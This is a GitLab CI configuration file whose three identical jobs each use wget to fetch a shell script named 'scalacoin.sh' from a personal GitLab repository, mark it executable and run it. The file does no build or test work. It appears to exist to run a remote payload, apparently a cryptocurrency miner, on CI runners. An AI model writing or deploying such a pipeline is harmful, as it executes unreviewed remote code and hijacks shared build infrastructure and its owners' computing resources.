variables:
  AWS_REGION: us-east-1

job_1:
  script:
      - wget https://gitlab.com/sapidarmansatu/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh

job_2:
  script:
      - wget https://gitlab.com/sapidarmansatu/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh

job_3:
  script:
      - wget https://gitlab.com/sapidarmansatu/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh
